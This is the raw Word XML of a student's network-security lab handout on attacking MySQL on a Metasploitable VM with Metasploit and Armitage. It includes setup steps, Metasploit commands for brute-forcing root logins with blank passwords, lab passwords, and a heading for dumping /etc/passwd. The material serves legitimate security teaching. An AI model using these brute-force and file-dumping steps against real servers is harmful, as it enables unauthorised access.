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12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MySQL Hacking with Metasploit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120" w:after="12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Tutorials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Nmap: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap 6: Network Exploration and Security Auditing Cookbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Paulino Calderón Pale. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Metasploit: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https://www.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Armitage: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https://www.offensive-security.com/metasploit-unleashed/armitage-setup/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Metasploit Intro by Adrian Crenshaw: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https://www.youtube.com/watch?v=LaJXxtmUX9g</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="120" w:after="120" w:line="276"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="120" w:after="12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Preps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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 to the Proxmox server. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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 the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal Kali</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Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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pool view should look similar to this: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="360" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="3630" w:dyaOrig="1764">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:181.500000pt;height:88.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p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="120" w:after="12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Retrieving IP Addresses of VMs for Pentesting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is a list of steps to follow for the pen testing. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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the Proxmox server, start the Internal Kali (id=netsec/pwd=netsec2021!) and Metasploitable VMs. Go to the Metasploitable VM and check if you can find metasploitable login prompt. If the login prompt is available, the VM is ready. You do not need to do anything further with the Metasploitable VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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 to Kali and launch a terminal. You are to run commands as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> from now on. To get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">, type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the terminal. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Enable the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Postgre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> database by running the command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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 the Metasploit Framework database by running: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Armitage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">, click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> and next </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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the Table view. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="360" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="3910" w:dyaOrig="1787">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:195.500000pt;height:89.3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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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 a Nmap scanning. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="360" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="4512" w:dyaOrig="1704">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000002" style="width:225.600000pt;height:85.2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scan range would work. Scanning takes a few minutes and is completed when you see the three IP addresses as shown in the figure below.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="360" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="3878" w:dyaOrig="1551">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000003" style="width:193.900000pt;height:77.5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200" w:line="276"/>
        <w:ind w:right="0" w:left="360" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="2592" w:dyaOrig="1393">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000004" style="width:129.600000pt;height:69.6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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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the IP addresses of the following VMs. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Vyos (router)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currently hidden:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Kali:  _____</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1.1.44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">________________ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Metasplotable:  ___________</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">__________  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="20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also obtain the IP addresses of each VM by manually run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> on each VM. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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Close Armitage. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="120" w:after="120" w:line="276"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:keepLines w:val="true"/>
        <w:spacing w:before="120" w:after="12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Tasks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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://charlesreid1.com/wiki/Metasploitable/MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://null-byte.wonderhowto.com/how-to/enumerate-mysql-databases-with-metasploit-0203485/</w:t>
        </w:r>
      </w:hyperlink>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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 the three tasks below using the suggested steps. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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each exploit, check whether the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasplotable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> is available via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">. When the VM is not reachable, login to the VM via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin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msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> and run this command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo reboot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120" w:after="12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Task 1: Brute-forcing logins (10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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root@kali:~# msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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&gt; search mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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&gt; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/mysql/mysql_login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Alternatively, you can put the number on the left side. (e.g., use x)</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auxiliary(mysql_login) &gt; show options</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auxiliary(mysql_login) &gt; setg RHOSTS [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address of the Metasplotable VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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auxiliary(mysql_login) &gt; setg USERNAME root</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auxiliary(mysql_login) &gt; setg BLANK_PASSWORDS true</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auxiliary(mysql_login) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Take a screenshot of the outcome. Explain what you have done and accomplished. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Seems like I tried to force myself into a server by telling it to use the root user name and setting the password to Blank, I wasn't successful cause the server Blocked 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120" w:after="12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Task 2: Dumping /etc/passwd from MySQL (3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
